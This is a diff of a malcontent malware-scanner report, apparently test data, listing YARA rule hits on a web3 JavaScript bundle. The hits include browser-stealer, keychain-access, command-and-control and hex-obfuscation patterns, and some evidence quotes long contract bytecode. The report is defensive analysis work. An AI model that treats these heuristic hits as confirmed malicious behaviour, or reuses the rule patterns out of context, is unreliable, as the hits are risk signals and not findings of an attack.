[a>>>8](https://github.com/search?q=a%3E%3E%3E8&type=code)
[b>>>0](https://github.com/search?q=b%3E%3E%3E0&type=code)
[c>>>0](https://github.com/search?q=c%3E%3E%3E0&type=code)
[c>>>5](https://github.com/search?q=c%3E%3E%3E5&type=code)
[c>>>8](https://github.com/search?q=c%3E%3E%3E8&type=code)
[d>>>6](https://github.com/search?q=d%3E%3E%3E6&type=code)
[d>>>7](https://github.com/search?q=d%3E%3E%3E7&type=code)
[d>>>8](https://github.com/search?q=d%3E%3E%3E8&type=code)
[e>>>0](https://github.com/search?q=e%3E%3E%3E0&type=code)
[e>>>4](https://github.com/search?q=e%3E%3E%3E4&type=code)
[e>>>5](https://github.com/search?q=e%3E%3E%3E5&type=code)
[e>>>7](https://github.com/search?q=e%3E%3E%3E7&type=code)
[e>>>8](https://github.com/search?q=e%3E%3E%3E8&type=code)
[f>>>8](https://github.com/search?q=f%3E%3E%3E8&type=code)
[h>>>6](https://github.com/search?q=h%3E%3E%3E6&type=code)
[h>>>7](https://github.com/search?q=h%3E%3E%3E7&type=code)
[h>>>8](https://github.com/search?q=h%3E%3E%3E8&type=code)
[i>>>0](https://github.com/search?q=i%3E%3E%3E0&type=code)
[i>>>5](https://github.com/search?q=i%3E%3E%3E5&type=code)
[k>>>4](https://github.com/search?q=k%3E%3E%3E4&type=code)
[l>>>0](https://github.com/search?q=l%3E%3E%3E0&type=code)
[l>>>8](https://github.com/search?q=l%3E%3E%3E8&type=code)
[m>>>0](https://github.com/search?q=m%3E%3E%3E0&type=code)
[n>>>0](https://github.com/search?q=n%3E%3E%3E0&type=code)
[n>>>5](https://github.com/search?q=n%3E%3E%3E5&type=code)
[n>>>7](https://github.com/search?q=n%3E%3E%3E7&type=code)
[n>>>8](https://github.com/search?q=n%3E%3E%3E8&type=code)
[o>>>0](https://github.com/search?q=o%3E%3E%3E0&type=code)
[o>>>4](https://github.com/search?q=o%3E%3E%3E4&type=code)
[o>>>5](https://github.com/search?q=o%3E%3E%3E5&type=code)
[o>>>8](https://github.com/search?q=o%3E%3E%3E8&type=code)
[p>>>0](https://github.com/search?q=p%3E%3E%3E0&type=code)
[p>>>7](https://github.com/search?q=p%3E%3E%3E7&type=code)
[p>>>8](https://github.com/search?q=p%3E%3E%3E8&type=code)
[q>>>0](https://github.com/search?q=q%3E%3E%3E0&type=code)
[q>>>3](https://github.com/search?q=q%3E%3E%3E3&type=code)
[r>>>0](https://github.com/search?q=r%3E%3E%3E0&type=code)
[r>>>8](https://github.com/search?q=r%3E%3E%3E8&type=code)
[s>>>0](https://github.com/search?q=s%3E%3E%3E0&type=code)
[s>>>6](https://github.com/search?q=s%3E%3E%3E6&type=code)
[s>>>8](https://github.com/search?q=s%3E%3E%3E8&type=code)
[t>>>0](https://github.com/search?q=t%3E%3E%3E0&type=code)
[t>>>7](https://github.com/search?q=t%3E%3E%3E7&type=code)
[t>>>9](https://github.com/search?q=t%3E%3E%3E9&type=code)
[u>>>8](https://github.com/search?q=u%3E%3E%3E8&type=code)
[v>>>0](https://github.com/search?q=v%3E%3E%3E0&type=code)
[v>>>8](https://github.com/search?q=v%3E%3E%3E8&type=code)
[w>>>3](https://github.com/search?q=w%3E%3E%3E3&type=code)
[w>>>7](https://github.com/search?q=w%3E%3E%3E7&type=code)
[x>>>9](https://github.com/search?q=x%3E%3E%3E9&type=code)
[z>>>0](https://github.com/search?q=z%3E%3E%3E0&type=code) | | +HIGH | **[c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#exotic_tld)** | Contains HTTP hostname with unusual top-level domain | [https://api.mantlescan.xyz/](https://api.mantlescan.xyz/)
[https://mantlescan.xyz/](https://mantlescan.xyz/)
[https://openchain.xyz/](https://openchain.xyz/) | | +HIGH | **[data/builtin/appkit](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/builtin/appkit.yara#appkit)** | Includes AppKit, a web3 blockchain library | [Price impact reflects the change in market price due to your trade](https://github.com/search?q=Price+impact+reflects+the+change+in+market+price+due+to+your+trade&type=code)
[Select which chain to connect to your multi](https://github.com/search?q=Select+which+chain+to+connect+to+your+multi&type=code) | | +MEDIUM | **[anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse)** | converts hex data to ASCII | [toString("hex");](https://github.com/search?q=toString%28%22hex%22%29%3B&type=code) | -| +MEDIUM | **[anti-static/obfuscation/python](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/python.yara#python_long_hex)** | contains a large hexadecimal string variable | [="0x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e816101](https://github.com/search?q=%3D%220x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e816101&type=code)
[Zc="0x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e8161](https://github.com/search?q=Zc%3D%220x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e8161&type=code)
[c="0x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e81610](https://github.com/search?q=c%3D%220x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e81610&type=code) | +| +MEDIUM | **[anti-static/obfuscation/python](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/python.yara#python_long_hex)** | contains a large hexadecimal string variable | [Zc="0x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e81610103573d81fd5b3d81f35b80516001600160a01b038116811461011e57600080fd5b919050565b634e487b7160e01b600052604160045260246000fd5b60005b8381101561015457818101518382015260200161013c565b50506000910152565b600082601f83011261016e57600080fd5b81516001600160401b0381111561018757610187610123565b604051601f8201601f19908116603f011681016001600160401b03811182821017156101b5576101b5610123565b6040528181528382016020018510156101cd57600080fd5b6101de826020830160208701610139565b949350505050565b600080600080608085870312156101fc57600080fd5b6102](https://github.com/search?q=Zc%3D%220x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e81610103573d81fd5b3d81f35b80516001600160a01b038116811461011e57600080fd5b919050565b634e487b7160e01b600052604160045260246000fd5b60005b8381101561015457818101518382015260200161013c565b50506000910152565b600082601f83011261016e57600080fd5b81516001600160401b0381111561018757610187610123565b604051601f8201601f19908116603f011681016001600160401b03811182821017156101b5576101b5610123565b6040528181528382016020018510156101cd57600080fd5b6101de826020830160208701610139565b949350505050565b600080600080608085870312156101fc57600080fd5b6102&type=code) | | +MEDIUM | **[c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord)** | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) | -| +MEDIUM | **[c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID)** | contains a client ID | [clientId](https://github.com/search?q=clientId&type=code)
[client_id](https://github.com/search?q=client_id&type=code) | -| +MEDIUM | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref)** | references multiple operating systems | [Linux](https://github.com/search?q=Linux&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://) | +| +MEDIUM | **[c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID)** | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | +| +MEDIUM | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref)** | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Linux](https://github.com/search?q=Linux&type=code) | | +MEDIUM | **[credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain)** | accesses a keychain | [keychain](https://github.com/search?q=keychain&type=code) | | +MEDIUM | **[crypto/blockchain](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/blockchain.yara#blockchain)** | blockchain | [blockchain](https://github.com/search?q=blockchain&type=code) | | +MEDIUM | **[crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext)** | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | +MEDIUM | **[crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user)** | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code) | | +MEDIUM | **[crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid)** | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | -| +MEDIUM | **[data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url)** | Contains base64 url | [odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code) | +| +MEDIUM | **[data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url)** | Contains base64 url | [contains_base64_url::odHRwOi8v](https://github.com/search?q=contains_base64_url%3A%3AodHRwOi8v&type=code) | | +MEDIUM | **[discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname)** | [get system identification](https://nodejs.org/api/process.html) | [process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | -| +MEDIUM | **[exfil/stealer/browser](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/browser.yara#userdata_browser_archiver)** | Uses HTTP, archives, and references multiple browsers | [.config](https://github.com/search?q=.config&type=code)
[Brave](https://github.com/search?q=Brave&type=code)
[Chrome](https://github.com/search?q=Chrome&type=code)
[Discord](https://github.com/search?q=Discord&type=code)
[Firefox](https://github.com/search?q=Firefox&type=code)
[Opera](https://github.com/search?q=Opera&type=code)
[POST](https://github.com/search?q=POST&type=code)
[Safari](https://github.com/search?q=Safari&type=code)
[https](https://github.com/search?q=https&type=code)
[zip](https://github.com/search?q=zip&type=code) | +| +MEDIUM | **[exfil/stealer/browser](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/browser.yara#userdata_browser_archiver)** | Uses HTTP, archives, and references multiple browsers | [.config](https://github.com/search?q=.config&type=code)
[Discord](https://github.com/search?q=Discord&type=code)
[Firefox](https://github.com/search?q=Firefox&type=code)
[Chrome](https://github.com/search?q=Chrome&type=code)
[Safari](https://github.com/search?q=Safari&type=code)
[Brave](https://github.com/search?q=Brave&type=code)
[Opera](https://github.com/search?q=Opera&type=code)
[https](https://github.com/search?q=https&type=code)
[POST](https://github.com/search?q=POST&type=code)
[zip](https://github.com/search?q=zip&type=code) | | +MEDIUM | **[exfil/stealer/credit_card](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/credit_card.yara#credit_card)** | references 'credit card' | [credit card](https://github.com/search?q=credit+card&type=code) | -| +MEDIUM | **[fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val)** | references and possibly executes relative path | [./aes](https://github.com/search?q=.%2Faes&type=code)
[./blowfish](https://github.com/search?q=.%2Fblowfish&type=code)
[./cipher-core](https://github.com/search?q=.%2Fcipher-core&type=code)
[./core](https://github.com/search?q=.%2Fcore&type=code)
[./evpkdf](https://github.com/search?q=.%2Fevpkdf&type=code)
[./format-hex](https://github.com/search?q=.%2Fformat-hex&type=code)
[./hmac](https://github.com/search?q=.%2Fhmac&type=code)
[./lib-typedarrays](https://github.com/search?q=.%2Flib-typedarrays&type=code)
[./mode-cfb](https://github.com/search?q=.%2Fmode-cfb&type=code)
[./mode-ctr-gladman](https://github.com/search?q=.%2Fmode-ctr-gladman&type=code)
[./mode-ecb](https://github.com/search?q=.%2Fmode-ecb&type=code)
[./mode-ofb](https://github.com/search?q=.%2Fmode-ofb&type=code)
[./pad-nopadding](https://github.com/search?q=.%2Fpad-nopadding&type=code)
[./pad-zeropadding](https://github.com/search?q=.%2Fpad-zeropadding&type=code)
[./path](https://github.com/search?q=.%2Fpath&type=code)
[./rabbit-legacy](https://github.com/search?q=.%2Frabbit-legacy&type=code)
[./tripledes](https://github.com/search?q=.%2Ftripledes&type=code) | +| +MEDIUM | **[fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val)** | references and possibly executes relative path | [./mode-ctr-gladman](https://github.com/search?q=.%2Fmode-ctr-gladman&type=code)
[./lib-typedarrays](https://github.com/search?q=.%2Flib-typedarrays&type=code)
[./pad-zeropadding](https://github.com/search?q=.%2Fpad-zeropadding&type=code)
[./pad-nopadding](https://github.com/search?q=.%2Fpad-nopadding&type=code)
[./rabbit-legacy](https://github.com/search?q=.%2Frabbit-legacy&type=code)
[./cipher-core](https://github.com/search?q=.%2Fcipher-core&type=code)
[./format-hex](https://github.com/search?q=.%2Fformat-hex&type=code)
[./tripledes](https://github.com/search?q=.%2Ftripledes&type=code)
[./blowfish](https://github.com/search?q=.%2Fblowfish&type=code)
[./mode-cfb](https://github.com/search?q=.%2Fmode-cfb&type=code)
[./mode-ecb](https://github.com/search?q=.%2Fmode-ecb&type=code)
[./mode-ofb](https://github.com/search?q=.%2Fmode-ofb&type=code)
[./evpkdf](https://github.com/search?q=.%2Fevpkdf&type=code)
[./core](https://github.com/search?q=.%2Fcore&type=code)
[./hmac](https://github.com/search?q=.%2Fhmac&type=code)
[./path](https://github.com/search?q=.%2Fpath&type=code)
[./aes](https://github.com/search?q=.%2Faes&type=code) | | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [useragent](https://github.com/search?q=useragent&type=code) | -| +MEDIUM | **[impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat)** | references a 'heartbeat' | [heartBeatTimeout](https://github.com/search?q=heartBeatTimeout&type=code)
[heartbeat_pulse](https://github.com/search?q=heartbeat_pulse&type=code)
[lastHeartbeatResponse](https://github.com/search?q=lastHeartbeatResponse&type=code)
[updateLastHeartbeat](https://github.com/search?q=updateLastHeartbeat&type=code) | +| +MEDIUM | **[impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat)** | references a 'heartbeat' | [lastHeartbeatResponse](https://github.com/search?q=lastHeartbeatResponse&type=code)
[updateLastHeartbeat](https://github.com/search?q=updateLastHeartbeat&type=code)
[heartBeatTimeout](https://github.com/search?q=heartBeatTimeout&type=code)
[heartbeat_pulse](https://github.com/search?q=heartbeat_pulse&type=code) | | +MEDIUM | **[impact/resource/bank_xfer](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/resource/bank_xfer.yara#bank_xfer)** | references 'bank transfer' | [bank transfer](https://github.com/search?q=bank+transfer&type=code) | -| +MEDIUM | **[net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload)** | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[post](https://github.com/search?q=post&type=code) | +| +MEDIUM | **[net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload)** | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | | +MEDIUM | **[net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post)** | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | +MEDIUM | **[net/http/webhook](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/webhook.yara#webhook)** | supports webhooks | [callWebhook](https://github.com/search?q=callWebhook&type=code) | -| +MEDIUM | **[net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket)** | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WalletLinkWebSocket](https://github.com/search?q=WalletLinkWebSocket&type=code)
[WebSocket:gV](https://github.com/search?q=WebSocket%3AgV&type=code)
[WebSocket:typeof](https://github.com/search?q=WebSocket%3Atypeof&type=code)
[WebSocketClass:h](https://github.com/search?q=WebSocketClass%3Ah&type=code)
[WebSocketClass:l](https://github.com/search?q=WebSocketClass%3Al&type=code)
[clearWebSocket](https://github.com/search?q=clearWebSocket&type=code)
[webSocket:e](https://github.com/search?q=webSocket%3Ae&type=code)
[webSocket:r](https://github.com/search?q=webSocket%3Ar&type=code)
[webSocket:t](https://github.com/search?q=webSocket%3At&type=code) | +| +MEDIUM | **[net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket)** | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WalletLinkWebSocket](https://github.com/search?q=WalletLinkWebSocket&type=code)
[WebSocket:typeof](https://github.com/search?q=WebSocket%3Atypeof&type=code)
[WebSocketClass:h](https://github.com/search?q=WebSocketClass%3Ah&type=code)
[WebSocketClass:l](https://github.com/search?q=WebSocketClass%3Al&type=code)
[clearWebSocket](https://github.com/search?q=clearWebSocket&type=code)
[WebSocket:gV](https://github.com/search?q=WebSocket%3AgV&type=code)
[webSocket:e](https://github.com/search?q=webSocket%3Ae&type=code)
[webSocket:r](https://github.com/search?q=webSocket%3Ar&type=code)
[webSocket:t](https://github.com/search?q=webSocket%3At&type=code) | | +MEDIUM | **[net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr)** | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code)
[ipAddr](https://github.com/search?q=ipAddr&type=code) | | +MEDIUM | **[net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen)** | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[socket](https://github.com/search?q=socket&type=code) | | +MEDIUM | **[net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode)** | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| +MEDIUM | **[net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls)** | requests resources via URL | [openURL](https://github.com/search?q=openURL&type=code)
[requests.get(e)](https://github.com/search?q=requests.get%28e%29&type=code) | +| +MEDIUM | **[net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls)** | requests resources via URL | [requests.get(e)](https://github.com/search?q=requests.get%28e%29&type=code)
[openURL](https://github.com/search?q=openURL&type=code) | | +MEDIUM | **[net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer)** | makes outgoing WebRTC connections, uses blockchain | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | -| +LOW | **[credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password)** | references a 'password' | [PasswordBasedCipher](https://github.com/search?q=PasswordBasedCipher&type=code)
[to countless passwords](https://github.com/search?q=to+countless+passwords&type=code) | +| +LOW | **[credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password)** | references a 'password' | [to countless passwords](https://github.com/search?q=to+countless+passwords&type=code)
[PasswordBasedCipher](https://github.com/search?q=PasswordBasedCipher&type=code) | | +LOW | **[credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val)** | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code) | | +LOW | **[crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes)** | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | +LOW | **[crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt)** | decrypts data | [createDecryptor](https://github.com/search?q=createDecryptor&type=code) | | +LOW | **[crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519)** | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | | +LOW | **[crypto/hmac](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/hmac.yara#hmac)** | Uses HMAC (Hash-based Message Authentication Code) | [HMAC.init](https://github.com/search?q=HMAC.init&type=code) | -| +LOW | **[crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key)** | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code) | +| +LOW | **[crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key)** | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/encoding/qr_code](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/qr_code.yara#qr_code)** | works with QR Codes | [QR Code](https://github.com/search?q=QR+Code&type=code) | | +LOW | **[fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open)** | opens files | [open(](https://github.com/search?q=open%28&type=code) | -| +LOW | **[fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount)** | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| +LOW | **[net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_json)** | accepts JSON files via HTTP | [Accept](https://github.com/search?q=Accept&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code) | +| +LOW | **[fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount)** | mounts file systems | [mount](https://github.com/search?q=mount&type=code)
[-o](https://github.com/search?q=-o&type=code) | +| +LOW | **[net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_json)** | accepts JSON files via HTTP | [application/json](https://github.com/search?q=application%2Fjson&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | | +LOW | **[net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo)** | Network address and service translation | [getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | | +LOW | **[net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg)** | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [_send](https://github.com/search?q=_send&type=code) | | +LOW | **[os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#get_env_val)** | Retrieve environment variable values | [env.DEBUG](https://github.com/search?q=env.DEBUG&type=code)
[env.MODE](https://github.com/search?q=env.MODE&type=code)
[env.NEXT](https://github.com/search?q=env.NEXT&type=code)
[env.NODE](https://github.com/search?q=env.NODE&type=code) | | +LOW | **[os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read)** | reads from a file handle | [e.read()](https://github.com/search?q=e.read%28%29&type=code) | -| +LOW | **[os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write)** | writes to a file handle | [a.write(o)](https://github.com/search?q=a.write%28o%29&type=code)
[decoder.write(n)](https://github.com/search?q=decoder.write%28n%29&type=code)
[decoder.write(t)](https://github.com/search?q=decoder.write%28t%29&type=code)
[e.write(t)](https://github.com/search?q=e.write%28t%29&type=code)
[i.write(e)](https://github.com/search?q=i.write%28e%29&type=code)
[t.write(o)](https://github.com/search?q=t.write%28o%29&type=code)
[this.write(e)](https://github.com/search?q=this.write%28e%29&type=code) | +| +LOW | **[os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write)** | writes to a file handle | [decoder.write(n)](https://github.com/search?q=decoder.write%28n%29&type=code)
[decoder.write(t)](https://github.com/search?q=decoder.write%28t%29&type=code)
[this.write(e)](https://github.com/search?q=this.write%28e%29&type=code)
[a.write(o)](https://github.com/search?q=a.write%28o%29&type=code)
[e.write(t)](https://github.com/search?q=e.write%28t%29&type=code)
[i.write(e)](https://github.com/search?q=i.write%28e%29&type=code)
[t.write(o)](https://github.com/search?q=t.write%28o%29&type=code) | ### 2 removed behaviors @@ -65,10 +65,10 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Downloads](https://github.com/search?q=Downloads&type=code)
[downloads-view](https://github.com/search?q=downloads-view&type=code)
[mobile-download-links](https://github.com/search?q=mobile-download-links&type=code) | +| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [mobile-download-links](https://github.com/search?q=mobile-download-links&type=code)
[downloads-view](https://github.com/search?q=downloads-view&type=code)
[Downloads](https://github.com/search?q=Downloads&type=code) | | LOW | [data/encoding/json_decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [JSON.parse](https://github.com/search?q=JSON.parse&type=code) | | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [plugin_relativeTime](https://github.com/search?q=plugin_relativeTime&type=code)
[plugin_updateLocale](https://github.com/search?q=plugin_updateLocale&type=code)
